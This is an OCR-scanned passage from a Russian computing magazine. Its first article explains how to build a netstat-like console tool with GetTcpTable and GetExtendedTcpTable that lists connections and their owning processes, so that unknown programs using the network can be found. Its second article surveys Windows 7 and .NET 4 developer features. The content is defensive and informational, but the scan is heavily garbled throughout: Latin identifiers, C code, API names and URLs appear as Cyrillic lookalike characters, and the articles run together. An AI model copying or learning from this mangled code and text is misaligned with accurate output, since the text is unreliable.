нарушителя, съедающего твой трафик. 

ИНСТРУМЕНТАРИЙ 

С целью организации хорошего улова нам понадобится любой С/ 

С++ компилятор, прямые руки и немного мозгов. Итак, для получе- 
ния всех соединений мел ко мягкие предоставляют набор функций 
библиотеки ірЫрІіЬ.сШ. Не ко всем компиляторам поставляются ак- 
туальные на сегодняшний день заголовочные файлы, поэтому функ- 
ции будем вызывать по их адресу. Сегодня мы станем использовать 
пришедшие на смену старым функции беОГсрТаЫеП, ѲеШбрТаЫеП, 
6еіЕх1:епсІесІТсрТаЫе(] и Эе1:Ех1:епсІесШсІрТаЫе(). Кстати, для послед- 
них двух необходим, как минимум, ѴѴіпсІоѵѵз ХР 5Р2 (вряд ли это со- 
ставит для тебя проблему]. Функции АІІосаІеАпсІбеПГсрТаЫеРгоппБі: 
аск(] и ей подобные, с таким трепетом рекомендуемые на множестве 
форумов, я использовать не буду по причине их древности — совре- 
менными ОС они не поддерживаются. Все наши функции хранятся в 
библиотеке ІрЫрарі.сІІІ, располагающейся в системной директории. 

ТСР 

Функция ОеіТсрТаЫеП получает та блицу всех Тер -соед и нений в 
системе: 

ВЖЖВ СеСТсрТаЫе (РМІВ_ТСРТАВЬЕ рТсрТаЫе, 

РВЖЖВ рсЪЖіге, ВООЬ ЪОгсІег) ; 

СуреЪеЗ ВЖЖВ (ѴШТАРІ * РКОССЕТТСРТАВЬЕ ) 

( РМІВ_ТСРТАВЬЕ , РВЖЖВ, ВООЬ); 

Здесь мы объявили прототип этой функции (РР0ССЕТТСРТАВ1_Е). 
Итак, рассмотрим параметры подробнее. Всего ихтри: 
рТсрТаЫе — указатель на выделенный буфер, куда будет записана 
таблица МІВ_ТСРТАВЕЕ. 

рсІѵѵЗіге — размер выделенного буфера; если же буфера будет недо- 
статочно, то в эту переменную запишется размер буфера, нужного 
для размещения таблицы. 

ЬОгсІег — если ТВИЕ, то указывает, что полученную таблицу нужно 
отсортировать по следующим параметрам в порядке: 

1. Локальный ІР-адрес. 

2. Локальный порт. 

3. Удаленный ІР-адрес, 

4. Удаленный порт. 

Функция при успехе возвращает Ы0_ЕРР0В; при ошибке воз- 
можно несколько значений, здесь мы рассмотрим только одно: 

Е Р РО Р_І N 5И РРІ С I Е ЫТ_В И РРЕ Р — если буфер, на который указы- 
вает рТсрТаЫе, недостаточно большого размера, нужный размер 
возвращен в значении по адресу рсІѵѵЗіге. Остальные значения, а 
также более подробное описание функции ты можешь найти в М50ІЧ 
( тзсІп.тісгозоЛ.сот ). 

т 

Теперь перейдем кІЮР-соединениям. Прототип, согласно М50І\І, 
выглядиттак: 

ВЖЖВ СеВШрТаЫе ( РМІВ_ВВРТАВЬЕ рШрТаЫе, 

РВЖЖВ рсЪЖі зе, ВООЬ ЪОгсІег) ; 

ЦуреЪеЗ ВЖЖВ (ѴШТАРІ * РКОССЕТГОРТАВЬЕ ) 

{РМІВ_ ОрРТАВЪЕ , РВЖЖВ, ВООЬ); 



ОБЕЩАННАЯ ФУНКЦИЯ 6ЕТРВОСЕ55ЫАМЕВѴЮ 



ЬРЗТК СеВРгосеззЫатеВуІВ (ЬРЗТК ІрззЕхеЫате , 
сопзЬ ВЖЖВ сімІВ) 

{ 

НАЫВЬЕ ЪРгосеззЗпарзЪоЬ ; 

РКОСЕЗЗЕЫТКУ32 РЕ32; 

ВШКВ сЬЖІад = 1; 

/ /Делаем снимок всех процессов 
ЪРгосеззЗпарзЪоЬ = СгеаЬеТоо1Ъе1р323парзЪоЬ 
(ТН32СЗ_ЗЫАРРКОСЕЗЗ, 0); 

//Заполняем размер структуры — так функция 
узнает ее версию 

РЕ32 . йѵ/Зізе = зізеоТ ( РКОСЕЗЗЕЫТКУ32 ) ; 

//Первый процесс снимка 

Ргосезз32ЕігзЬ (ЪРгосеззЗпарзЪоЬ , &РЕ32) ; 

Ъо { 

// Если мы нашли процесс, то копируем 
// его имя и завершаем цикл 
ІТ ( РЕ32 . ЬЪ32РгосеззІВ == сіѵЖВ) 

ІзЬгсруА ( ІрззЕхеЫаше , РЕ32 . ззЕхеЕіІе) , 
сЗжРІад = 0 ; 

} 

//Перечисляем процессы до тех пор, 

//пока не найдем или пока есть следующий процесс 
Жіііе (ЪѵЖІад && Ргосезз32ЫехЬ ( 
ЪРгосеззЗпарзТюЬ , &РЕ32)); 

СІозеНапЪІе (ЪРгосеззЗпарзЪоЬ ) ; 

//Если нашли имя, то возвращаем его, иначе ЖПЗЬ 
геЬигп ЪѵЖІад ? ШЬЬ : ІрззЕхеЫаше ; 

} 



Про последние два параметра мы уже все знаем (правда, сортировка 
идеттолько по ІР-адресу и порту), а указатель на структуру имееттип 
РМІВ_ПОРТАВЕЕ, так как сама таблица немного отличается. 

СТРУКТУРА ТАБЛИЦ 

Рассмотрим таблицу, в которую занесутся ТС Р-соеди нения, МІВ_ 
ТСРТАВЕЕ. Она определена ниже и значения ее полей ясны из на- 
звания. Отмечу только, что адреса и порты представлены в сетевом 
формате (старший байт по старшему адресу): 

ЦуреЪеТ зСгис _МІВ_ТСРТАВЬЕ 
{ 

ВЖЖВ ЪШитЕпЬгіез ; 

МІВ_ТСРК(Ж ІаЫе [АЕУ_ЗІ2Е] ; 

} 

МІВ_ТСРТАВЬЕ, *РМІВ_ТСРТАВЬЕ; 

Параметр бѵѵЫитЕпІгіез — количество записей, то есть соединений, 
а {аЫе — массив записей, имеющих воттакой вид: 

ЦуреЪе^ зСгисЦ _МІВ_ТСРКОШ 
{ 

ВШКВ ЪыЗЬаЬе; 
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ССЮІЫО 



УЮгкѴі е июг-ях е 



[Л 5 ТЕН 



Е5ТЙЕІЛ 8НЕ0 



1ЙВ ЛЙЙ Л 16 ЛШШ = 7<И0 



СЕ ОКЕ Ш 



ІЕЬаі'епап . ехе 
ІТ 

Р іі^е?ох*ехе 

II ВД 

СЗугІет Рі'осез 
1 1 НЕ.1ІЙ 1 1 
ЗНагепап *ехе 
НЕВ 

ЗЬагетап . ехе 

НЕВ 

рЗЬамтап *ехе 
НИ) 

Зішгепіагс . ехе 



188 Л 28 . 116 Л 00: 7030 



СШБЕ.0Й 



Е8ТАВЫ8 



Е5ТАВЫ8 



192 .168 .0.101 : 2220 



Е5ТЙВІЛ5 



192 Л 68. 0*101:2222 



Е8ТАШЛЗ 



192 Л 68-0*101 -2228 



Е8ТАВЫ8 



192 .16В. 0.1 01 =2869 
192 Л 68,0. 101 =2869 
192 Л68-ѲЛ01 =2869 
192 Л 68 .0 Л 01 =2869 
192 .168.0.101 =2869 



192 .168.0. 1 =2055 

192 . 168.0. 1 :20Й4 
192 . 168-0-1 32108 

192.168.0. 1 =2137 

192.168 .0. 1 :2І54 



СЬ08Е_1ІЙ1Т 
СЬ08Е_УЙІІ 
СЬОЗЕ ШИ 
СЬ08Ё_Мй ГТ 
СЬ03Е_УЙ ГТ 



ВОТ И ПЕРВЫЙ НАРУШИТЕЛЬ — НЕПОНЯТНЫЙ ПРОЦЕСС, УСТАНОВИВШИЙ СОЕДИНЕНИЕ 




> сіѵсі 

На диске смотри 
исходники, настро- 
енные под М5 Ѵізиаі 
Зіисііо. 
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сот — самый свежий 
МЭРЫ. 
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<±лШ.осаІАс1с1г | 


ВЖЖВ 


сЩЩосаІРогЬ ; 


ВЖЖВ 


сЩЩетоЬ е Асісіг 


ВЖЖВ 


сЫКетоЬ е Р о г Ь 



} МІВ_ТСРКОМ, *РМІВ_ТСРКОМ; 

Как видишь, тут присутствует состояние соединения 
(ожидает ли оно подключения, установлено или уже за- 
крывается), локальные и удаленные ІР-адрес с портом. 
Структуру ІЭ ЭР-таблиц ты можешь найти в М50Ы или в 
приложении кжурналу, а пока я приведу код, который 
покажет все ТСР-соединения в системе: 

ФУНКЦИЯ, ПОЛУЧАЮЩАЯ ВСЕ 
ТСР-СОЕДИНЕНИЯ В СИСТЕМЕ 

РМІВ_ТСРТАВЬЕ рТсрТаЫе ; 

БѴЮКБ (ІмЗіге = 0; 

рТсрТаЫе = ( РМІВ_ТСРТАВЪЕ ) ѴігЬиаІАІІос ( 

N11 ЬЬ , зігеоР (МІВ_ТСРТАВЪЕ ) , 

МЕМ_СОММІТ , РАСЕ_КЕАБМКІТЕ) ; 

і Р (СеЬТсрТаЫе (рТсрТаЫе, &сЫЗІ 2 е, ЕАЬЗЕ) 

= = ЕККОК_ШЗІІЕЕІСІЕЫТ_ВиЕЕЕК) 
рТсрТаЫе = ( РМІВ_ТСРТАВЪЕ) 

ѴігСиаІАІІос (ЫІЛІЬ, сІмЗіге, 

МЕМ_СОММІТ , РАСЕ_КЕАВМКІТЕ) ; 

СеЬТсрТаЫе (рТсрТаЫе , 8сдмЗіт.е , ТЕНЕ) ; 

ргіпЬі: ( " КетоЬе Асісігезз : КетоЬе РогЬ\ЬЗЬаЬе\п" ) ; 

іог (БШЕБ і = 0; 

і < рТсрТаЫе- > сі^ЫитЕпСгіез ; і + +) 

{ 



ргіпЫ: ( " %сЗ.. %сЗ.. %сЗ.. %сЗ.: %сЗ.\-Ь\-Ь%з\п" , 

ЬОВУТЕ ( ЬОѴГОКБ (рТсрТаЫе->ЬаЫе [ і ] . 
(ЗѵуКетоЬеАсМг ) ) , 

НІВУТЕ (ЬОМОКБ (рТсрТаЫе->СаЫе [ і ] . 
сЩКетоЬеАсМг ) ) , 

ЬОВУТЕ (НШОШЭ (рТсрТаЫе->ЬаЫе [ і ] . 
сІѵ/КетоЬеАсІсІг ) ) , 

НІВУТЕ (НШОКБ (рТсрТаЫе->ЬаЫе [ і ] . 
сЩКетоЬеАсМг ) ) , 

пЬоЬз ( рТсрТаЫе->1аЫе [ і ] . ЦмКетоЬеРогЬ ) , 
ІрІрзгЗЬаЬез [рТсрТаЫе->ЬаЫе [і ] . йшЗЬаЬе 
- 1 ] ) ; 

Попробую объяснить вышеприведенный исходник. В 
начале мы выделяем память под указатель, затем вы- 
зываем функцию с нулевым сІѵѵЭіге. Удивительно, не 
правда ли? Это делается с целью узнать актуальный 
(необходимый) размер структуры, чтобы туда поместился 
весь спи со к соединений (помнишь? при нехватке места 
функция возвращает необходимый). Далее мы резерви- 
руем память и вызываем функцию. И в цикле печатаем 
удаленный адрес, порт и состояние соединения, пере- 
водя порт и ІР из сетевого формата в формат I піе I. Вот 
и все, в прилагаемых файлах смотри полный исходник 
функции. 

БЕРЕМ СЕТЬ ПОД КОНТРОЛЬ 

Вдумчивый читатель (то есть, ты), наверняка, задал- 
ся вопросом: «какже мы будем контролировать сеть? 
Ведь мы еще ничего незнаемо самом соединении». 
Спокойно! Сейчас я познакомлю тебя и с Ех-функциями 
этого семейства, которые появились на свет, начиная с 
ѴѴіпсІоѵѵз ХР. Эти функции перехватывают многие руткиты 
и используют все файрволы, поскольку дают нам всю 
информацию о сети. Вот они: 
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БЖЖБ СеБЕхБепБеБТсрТаЫе ( 

РѴОІБ рТсрТаЫе, 

РБЖЖБ рботЗі 2е, 

ВООБ ЪОгБег, 

ББСШС иІАБ , 

ТСР_ТАВБЕ_СБА38 ТаЫеСІазз, 

ББСШС КезегѵеБ) ; 

ШОИ) СеБЕхБепсІесІБсІрТаЫе ( 

РѴОІБ рББрТаЫе, 

РБЖЖБ рБЖЗІге, 

ВООБ ЪОгБег, 

ББСШС иІАІ , 

ББР_ТАВБЕ_СБАЗЗ ТаЫеСІазз, 

ББСШС КезегѵеБ) ; 

Помимо открытых портов, функции поддерживают ІРѵб, позволяют 
выводить не только имя процесса, породившего соединение, но и 
имя модуля. Для нас они подходят просто идеально — будем охо- 
титься на зверька, который решил прогуляться по сети. 

Эти функции принимают первый параметр как нетипизированный 
указатель. Почему нетипизированный? Потому что тип структуры, 
куда занесется результат, заранее не известен и зависит от 
параметра ТаЫеСІазз. А параметр этот может принимать много 
значений, в частности, возможна выборка прослушивающих, уста- 
новленных соединений, всех вместе, а также он может получать Ю 
процесса или даже имя модуля, открывшего соединение. Это спра- 
ведливо для ІЮР и ТСР модулей. Еще надо учесть, что параметр 
и Ш принимает беззнаковое целое число, обозначающее получе- 
ние ІРѵ4 или ІРѵб ( АР_І N ЕТ и АР_І N ЕТ 6] соответственно. Но так как 
ІРѵб обладает большим рядом параметров, чем ІРѵ4, то количество 
типов таблиц будет равно 5 (для ІРѵб нельзя получить параметры 
соединения без РЮ). 

Нас будет интересовать структура типа МІЕ>_ТСРТАЕЮЕ_ОѴѴІ\ІЕР_ 
РЮ, в нее занесутся параметры соединений и РЮ каждого про- 
цесса. 



СТРУКТУРАДАННЫХ 

БуреБеІ зБгисБ 
{ 

БЖЖБ БѵШитЕпБгіез ; 

МІВ_ТСРКОМ_ОѴШЕК_РІБ БаЫе [ АБУ_ЗІ2Е ] ; 

} 

МІВ_ТСРТАВБЕ_ОѴШЕК_РІБ , * РМІВ_ТСРТАВБЕ_ОШГЕК_РІБ ; 

БуреБеІ зБгисБ 
{ 

БЖЖБ ЫгЗБаБе; 

БЖЖБ ЫБосаІАсІсІг ; 

БЖЖБ сЕѵБосаІРогБ ; 

БЖЖБ БѵЖетоБеАсІсІг ; 

БЖЖБ БѵЖетоБеРогБ ; 

БЖЖБ БѵГОшііпдРісІ; 

} 

МІ В_ТС РКОГО_ОШГЕК_Р I Б , * РМІ В_ТС РКОМ_ОѴШЕК_Р I Б ; 

Как мы видим, от структуры МІВ_ТСРРОѴѴ эта отличается наличием 
поля бѵѵОѵѵпідРісІ. 

Атеперь — приведем отслеживающий шпиона код: 

РМІВ_ТСРТАВБЕ_ОШЕК_РІБ рТсрТаЫе ; 

БЖЖБ ЫЗІге = 0; 

рТсрТаЫе = ( РМІВ_ТСРТАВБЕ_ОШГЕК_РІБ) ѴігБиаІАІІос ( 



ББББ, ЗІ 2 ѲОІ (МІВ_ТСРТАВБЕ_ОШГЕК_РІБ) , МЕМ_СОММІТ, 
РАСЕ_КЕАБѴЖІТЕ) ; 

СеБЕхБепсіесІТсрТаЪІе ( 

( РѴОІБ) рТсрТаЫе , 

&сіѵЖІ 2 е , 

ЕАБЗЕ , 

АЕ_ШЕТ, 

ТСР_ТАВБЕ_ОШЕК_РІБ_АББ , 

0 ) ? 

рТсрТаЫе = (РМІВ_ТСРТАВЕЕ_ОШГЕК_РІБ) ѴігБиаІАІІос 
(ШЕЕ, йотЗіге, МЕМ_СОММІТ, РАСЕ_КЕАБѴЖІТЕ ) ; } 

СеБЕхБепБеБТсрТаЫе (рТсрТаЫе , &Ы 8 І 2 е , 

ТЕБЕ, АЕ_ІБЕТ, ТСР_ТАВЕЕ_ОШЕК_РІБ_АЕБ , 0); 

бог ( БЖЖБ і = 0; і < рТсрТаЫе->БѵШитЕпБгіез ; і + +) 

{ 

ргіпББ ( " %з\Б%(і. %&. %сІ. %йг %Б.\п" , 

СеЕРгосеззБатеВуІБ ( ІрзгЕхеБате , 

рТсрТаЫе->БаЫе [ і ] . БѵЮшііпдРісІ) , 

БОВУТЕ (БОЖЖБ (рТсрТаЫе->БаЫе [ і ] . ЫЖетоБеАБЫ ) ) , 
НІВУТЕ (ЕОЖЖВ (рТсрТаЫе->БаЫе [ і ] . БѵЖешоЕеАсМг ) ) , 
БОВУТЕ (НІЖЖБ (рТсрТаЫе->БаЫе [і] . БѵЖетоБеАсМг ) ) , 
НІВУТЕ (НІЖЖВ ( рТсрТаЫе- >БаЫе [ і ] . БѵЖетоБеАсІсІг ) ) , 
пБоЬ.з (рТсрТаЫе->БаЫе [ і ] . сЕѵБосаІРогБ ) ) ; 

} 

Этот кусок кода выведет нам все процессы и места, куда они коннек- 
тятся, что позволиттутже выявить нарушителя границы. Функция 
ОеЮгосеззЫатеВуЮ моя, она определяет имя процесса по его 
идентификатору, исходникты сможешь найти во врезке. Кстати, не 
забудь объявить ее прототип: 

ЕуреБеІ БЖЖБ (ЖШАРІ * РКОССЕТЕХТЕББЕБТСРТАВБЕ ) 
(РѴОІБ, РБѴГОКБ, ВООБ, БЕОМС, ТСР_ТАВБЕ_СБАЗЗ , ББСШС); 

И где-нибудь (я делаю это в таіп(]] инициализировать указатель: 

НМОБББЕ ЬБіЪ = БоасІБіЬгагуА ( " ірЫрарі . БІ 1 " ) ; 

СеБЕхБепсіесІТсрТаЪІе = ( РКОССЕТЕХТЕББЕБТСРТАВЕЕ ) 
СеБРгосАЪЪгезз (Ъ.ЕіЪ , " СеБЕхБепЪеЪТсрТаЫе " ) ; 

После инициализации функция может быть вызвана как обычная. 

Не забывай делать всевозможные проверки в коде — они у меня опу- 
щены в видутого, что журнал не резиновый. С ІЮР-подключениями 
ситуация полностью аналогична, новое будет только в ІРѵб — там 
структура содержит еще и ЭсореЮ-подключения. 

ЗАКЛЮЧЕНИЕ 

Полный исходник программы ты можешь найти на ЭѴР, она опреде- 
ляет порты подключений и представляет собой своеобразный, рас- 
ширенный аналог пеІЫаГа. 

Как видишь, вся работа очень проста, и ты можешь дополнить про- 
грамму многими удобными функциями. Например, резол вить 0145 
(т.е. определять имена хостов, например, через функцию ѴѴіпзос к 
деЮозЮуаббг], сделать автообновление, убивать неугодный про- 
цесс, задействовать очень полезную опцию «отображать только 
нелокальные подключения» — ведь многие программы открывают 
подключения на локалхост, а их нам мониторить не нужно. Графиче- 
ские программы с таким функционалом я встречал, а вот консоль- 
ных аналогов не видел, надеюсь, она будеттебе полезна. До новых 
встреч ! т 
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^ИалЁкСАНДР ЭККЕРТ АЬЕКБАЫРК-ЕНККЕКТгаКАМВЬЕР.КЦ 




В ИЮЛЬСКОМ ЗСУ НАС БЫЛА ОТДЕЛЬНАЯ СТАТЬЯ О НОВОМ ТАСКБАРЕ 

И О ТОМ. КАК РЕАЛИЗОВАТЬ ПОДДЕРЖКУ 
ВСЕХ ФИЧЕЙ ЭТОГО ТАСКБАРА В СВОИХ ПРИЛОЖЕНИЯХ. СЕГОДНЯ МЫ 
РЕШИЛИ ЕЩЕ РАЗ ВЗГЛЯНУТЬ НА НОВУЮ ВИНДУ ПРОГРАММИСТСКИМ 
ВЗГЛЯДОМ И ПОДГОТОВИЛИ ДЛЯ ТЕБЯ СПИСОК САМЫХ ЗНАЧИМЫХ. 
НА НАШ ВЗГЛЯД. ФИШЕК. В КУРСЕ КОТОРЫХ ДОЛЖЕН БЫТЬ ЛЮБОЙ 
ѴШ00ѴѴЗ-К0ДЕР. 



Забегая вперед, скажу, что каждый из этих пунктов заслуживает отдельной 
статьи, и в следующем годуты обязательно увидишь несколько мате- 
риалов из этой серии. Мы напишем и о программировании МиШТоисЬ- 
интерфейсов, и о разных системных штучках. Ну, а пока давай просто 
быстренько пробежимся по новым кодинговым возможностям ѴѴіпсІоѵѵз 7. 

БИБЛИОТЕКИ В ѴѴШ0ѴѴ5 7 

Библиотеки «семерки» являются определяемыми пользователем коллек- 
циями файлов, которые представляют данные, независимо оттого, где те 
хранятся на компьютере. Благодаря им, пользователи могутунифициро- 
вать и сгладить иерархию папок, собрав любое количество физических 
расположений (на локальной или удаленной машине] в одном месте — в 



библиотеке. Причем пользователи могут самостоятельно решать, какие 
папки должны быть в них включены , а какие нет. Втоже время, добавляя 
папки в библиотеки, пользователь сообщает ѴѴіпсІоѵѵз 7 отом, где располо- 
жены важныедля негаданные. В дальнейшем система будетиндекси- 
роватьэти папки, позволяя пользователю быстрее и эффективнее искать 
в них свой контент по свойствам файлов. Тем, кто озабочен разработкой 
приложений под ѴѴіпсІоѵѵз 7, интересно обеспечить взаимодействие их 
разработокс библиотеками. Это позволит интегрировать приложения 
пользователя в рабочую среду ѴѴіпсІоѵѵз и обеспечит согласованность 
работы приложений в различных сценариях. Поддержка разработки 
библиотек реализована в библиотеке ѴѴіпсІоѵѵз АРІ Сосіе РаскіюгМісгозоЙ 
. N ЕТ Рга т еѵѵо гк [ ЬіІрТ/собе.тзбп.тісгозоІТсот/ѴѴіпсІоѵѵзАРІСосІеРаск І . 
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ѴШОѴѴЗТОІІСН 

В новой ѴѴі псіоѵѵз 7 кардинальным образом изменился графический 
интерфейс. Он стал еще проще, привлекательнее и обзавелся под- 
держкой мультитача. Технология МиШТоисб, а точнее — просто ѴѴіпсІоѵѵз 
Тоисб, реализована практически в полном объеме. Если тебя привлекают 
вещички типа сенсорных панелей, то приготовься — обзаведись соот- 
ветствующим монитором и сможешь кодить программы, управляемые 
движениями пальцев. Болеетого, базовая поддержка МиШТоисЬ будет 
доступна и в уже существующих приложениях без изменений кода. 

Для реализации всех фи шек технол оги и ѴѴіпсІоѵѵз Тоисб разработчики 
приготовили большой набор АРІ-функций, поэтому встроить в свою про- 
грамму поддержку интерфейса МиШТоисЬ достаточно легко. Для этого в 
АРІ имеются функции, позволяющие научить приложение распознавать 
стандартные жесты, эталонные для других приложений. В большинстве 
приложений особые «выкрутасы» не нужны, поэтому этих функций для 
начала тебе вполне хватит, кроме того, к твоим услугам всегда будет па- 
кет низкоуровневых АРІ -интерфейсов, с помощью которого легко можно 
решить нестандартную задачу. 

ѴѴШОѴѴЗ 7 8йК 

Хотя ѴѴіпсІоѵѵз 7 5БК не входит в стандартную комплектацию, не будем обхо- 
дить его своим вниманием. Новый 5БК является прекрасным собранием до- 
кументации и примеровдля использования новыхАРІ-функций, предостав- 
ляемых ѴѴіпсІоѵѵз 7. Несмотря на тот, факт, что большинство этих примеров 
написаны на неуправляемом (паііѵе) коде для АРІ ѴѴіпсІоѵѵз 7, 
которые относятся кС, С++ и СОМ АРІ, это несильноусложнит жизнь разра- 
ботчикам управляемого кода: поддержка ключевых АРІ ѴѴіпсІоѵѵз 7 доступна 
через библиотеку ѴѴіпсІоѵѵз АРІ Собе Ра скіогМі егозой. ІЧЕТ Егатеѵѵогк. 

СИСТЕМНЫМ ПРОГРАММИСТАМ НА ЗАМЕТКУ 

Не остались без внимания и системные разработчики. Так, был пере- 
работан и улучшен механизм отслеживания событий в ѴѴіпсІоѵѵз — «Еѵепі 
Тгасіпд Го г ѴѴі псіоѵѵз» (ЕТѴѴ). Внедренный в ѴѴіпсІоѵѵз 2000, он был пред- 
назначен для ведения логов юзермодных приложений и различных 
системных событий, генерируемых какядромтаки его компонентами. 
Теперь системного программиста ждут значительные улучшения, свя- 
занные с отслеживанием событий ядра ОС, что также нашло отражение 
в .ІЧЕТ’овских языках в виде соответствующих АРІ. Сейчас ЕТѴѴспособен 
вести логи старта и окончания таких объектов как«Ргосезз», «ТЬгеаб», 
«Ітаде» и «Ргосезз», чего раньше не было. И это не все — также можно 
вести логи переключения контекста потоков (Сопіехі ВѵѵіГсЫ, вызова 
отложенных процедур (БРС) и векторов прерываний устройств (І5Р). Но 
и это еще не все — новый механизм ЕТѴѴ позволяет регистрировать со- 
бытия, связанные суправлением памятью — «Раде Байб еѵепіз», «Нагб 

I 



МНЕНИЕ ЭКСПЕРТА 



Алексей Федоров, 

эксперт по технологиям, 

Місгозой: 

Разработчикам стоит обратить 
пристальное внимание на 
ѴѴіпсІоѵѵз 7 - положительные 
отзывы заказчиков, уже раз- 
вернувших у себя эту ОС, а также 
скорость внедрения ѴѴіпсІоѵѵз 7 
доказывают, что новую ОС ждет 
долгая жизнь. Чем бы вы не за- 
нимались - написанием системного софта, прикладных решений 
или игр - ѴѴіпсІоѵѵз 7 содержит множество новых и обновленных 
технологий, которые позволят вам по-новому взглянуть на созда- 
ние приложений. Изучая возможности новой ОС, не забывайте о 
рекомендациях по написанию совместимого кода, использованию 
подсистем, обеспечивающих стабильную, надежную и безопасную 
работу приложений 




НЪп4«пп$ АРІ СЫя РлсЬ Тог К-сгоіоП Т 1 М ЕТ Ггапянигк 




БИБЛИОТЕКУ ѴѴШБОѴѴБ АРІ СОБЕ РАСК МОЖНО 
СКАЧАТЬ НА МББЫ’Е 

Раде ЕаиЙ еѵепіз» и «Ѵігіиаі Метогу еѵепіз». Программисты, пишущие 
на языках в .ІЧЕТ Егатеѵѵогк для того, чтобы во всей полноте прочувство- 
вать этот шик, могут обратиться к пространству имен Зузіет.Оіадпозіісз. 
Еѵепііпд, где представлены новые классы и методы. 

В ѴѴіпсІоѵѵз 7 зарелизили новую версию низкоуровнего интерфейса для 
сетевых карт— N015 6.20, которая, впрочем, несильно отличается от 
шестой версии. Само собой, в ядре ѴѴіпсІоѵѵз 7 актуальными остаются 
такие интерфейсы сетевой разработки, как ЫМР и КегпеіЗоск, впервые 
появившиеся в ѴѴіпсІоѵѵз Ѵізіа. И, внимание! Что меня особенно порадо- 
вало, такэто то, что поддержка ТБІ-интерфейса осталась — ужоченьне 
хотелось от него отказываться. 

^ЕТ РРАМЕѴѴОКК: ВЕРСИЯ 4 

Ведя разговор о новых возможностях в разработке софта под ѴѴіпсІоѵѵз, 
нельзя обойти стороной и готовящийся в настоящий момент релиз 
четвертой версии .ЫЕТ Егатеѵѵогк. Тем более, бета-версия нового 
фреймворка доступна уже порядочное время. 

Основной акцент в .ЫЕТ Егатеѵѵогк всегда делался на разработке 
ѵѵеЬ-приложений и ѵѵеЬ-сервисов, вследствие чего А5Р.ЫЕТ является 
сейчас, пожалуй, самой продвинутой частью .ЫЕТ Егатеѵѵогк. Теперь 
ѵѵеЬ-разработчикам предложены новые расширения А5Р.ЫЕТ А]ах и 
ЗіІѵегІідЫ:, что не может не радовать. К тому же, — пусть это и не прямая 
заслуга команды разработчиков А5Р.ЫЕТ — в рамках проекта Мопо 
практически любой А5Р.ЫЕТ веб-сайт может быть запущен налюбом баѵа 
Арріісаііоп сервере (62ЕЕ, Тотсаі и т.д.]. ѴѴіпсІоѵѵз Еогтз пока не может 
похвастаться такими успехами. 

Отныне в .ЫЕТ стало возможным использовать скриптовые языки, такие 
как ІгопРиЬу и ІгопРуібоп. Это реально, благодаря технологии поддержки 
динамических языков или БЕР (Бупатіс Бапдиаде Рипііте). ББР — 
компилятор динамических языков, который позволяет интерпретировать 
код, минуя этап его компиляции в СБР-байткод. 

Не хочется перехваливать данную особенность, но это похоже на 
явный, если можно так выразиться, маркетинговый ход со стороны 
Мі егозой. Ведь сейчас даже невооруженным глазом виден всплеск 
интереса к языкам Рыбу и Руібоп. Один мой знакомый программист, 
который трудится на нивеООП в одной очень достойной компании, за- 
нимающейся разработкой СРМ-систем, пришел прямо-таки в щенячий 
восторг, узнав о поддержке .ЫЕТ новых языков (и в том числе Рыбу], 
поскольку, с его слов, «влюбился в новый язык и не знал, что выбирать 
— С# или Рыбу». Болеетого, в .ЫЕТ Егатеѵѵогк предоставляются ис- 
ходники ББР, при помощи которых можно создать свой динамический 
языкдля . N ЕТ, если утебя есть необходимость. 

В четвертой .ЫЕТ появилось много нововведений, кпримеру, «Багу 
Іпіііаііаііоп» — память под объект выделяется, когда это действительно 
становится нужно, что положительно сказывается на быстродействии 
программ, созданных на .ЫЕТ’овскихязыках. Важной особенностью .ЫЕТ 
4.0 можно назвать и поддержку динамического типа, благодаря появле- 
нию ключевого слова бупатіе. Теперь при объявлении динамического 
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МНЕНИЕ ЭКСПЕРТА 



Владимир Арустамов | 

Главный девелопер Агоѵах, ІХС: 

Новая ОС от МІСГ050ІТ с первых бета-релизов 
завоевала уважение как рядовых пользовате- 
лей, таки профессиональных разработчиков. 

Одним из самых заметных нововведений 
является так называемый «ЗирегЪаг» — новая 
панель задач. Поддержка этой новинки 
требует некоторых затрат со стороны раз- 
работчиков софта, но улучшение юзабилити 
перекрывает все трудозатраты на реализацию новых возможностей. 
Создание эффектного пользовательского интерфейса значительно упро- 
щается, благодаря ѴѴіпсІоѵѵз 7 Апітагіоп Мапа^ег. Большинство современных 
пользователей любят красивые и эффектные графические интерфейсы и 
поддержка интерактивной анимации в приложениях на уровне ОС значи- 
тельно упростит жизнь разработчикам. 

Также стоит отметить механизм ѴѴіпсІоѵѵз Еггог Кероггіп^ и службу ѴѴпщиаІ, 
которые были значительно усовершенствованы со времен ѴѴіпсІоѵѵз ѴІ5і:а, с 
учетом накопленного опыта их использования. 

Технология Кезнагі: Мапа^ег поможет избежать неприятностей в случае сбоев 
программного обеспечения, которая перезапустит приложение и попытает- 
ся восстановить рабочие данные после критической ошибки. 







.ЫЕТ РРАМЕѴѴ0РК4 ВЕТА ДОСТУПНА ДЛЯ ЗАГРУЗКИ 

объекта можно обращаться к любому члену класса, при этом 
не зная заранее, что это за класс (то есть, не зная типа]. 

В .ЫЕТ Ргатеѵѵогк 4.0 интегрированы ѴѴР и ѴѴСР, что упро- 
щает разработку ориентированных на службы приложений. 
ѴѴСР и ѴѴР— взаимодополняющиетехнологии. Длятех, ктос 
ними незнаком, проще всего представить эту пару следую- 
щим образом: ѴѴСР снаружи, ѴѴР внутри. ѴѴСР используется 
для предоставления внешнего интерфейса службы прило- 
жения, а ѴѴР — для описания внутреннего потока, состояний 
и переходов приложения. 

Ранее .ЫЕТ Ргатеѵѵогк3.5 представила заманчивую воз- 
можность отправки и получения ѴѴР. С помощью этих дей- 
ствий ѴѴР можно упростить процесс координации несколь- 
кихслужб для выполнения комплексных, долговременных 
рабочих процессов. 

.ЫЕТ Ргатеѵѵогк 4.0 поставляется с усовершенствованной 
библиотекой базовых действий, содержащей несколько 
новых действий. «Майкрософт» также планирует предо- 
ставлять дополнительные действия ѴѴР через СобеРІех 
между крупными выпусками .ЫЕТ Ргатеѵѵогк. А в будущих 
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МНЕНИЕ ЭКСПЕРТА 



Андрей Комаров, 

Технический директор 
ИТЦ «Аналитика» 

уутлп/у.ййе^епсе.ги : 

ѴѴіпсіоѵѵз 7 с точки зрения 
безопасности воплотила 
в себе значительные 
изменения. Технология 
ѴѴіпсіоѵѵз Рікегіп^ ЙаГбогт 
(ѴѴРР) в первую очередь 
ориентирована на разра- 
ботчиков антивирусных 
продуктов и софтверных персональных МСЭ. Она 
позволяет через специальный интерфейс взаимо- 
действовать собственным продуктам с возможно- 
стями встроенного ѴѴіпсіоѵѵз Рігеѵѵаіі. 

Также появилась возможность шифровать съемные 
отделяемые носители штатными средствами ОС 
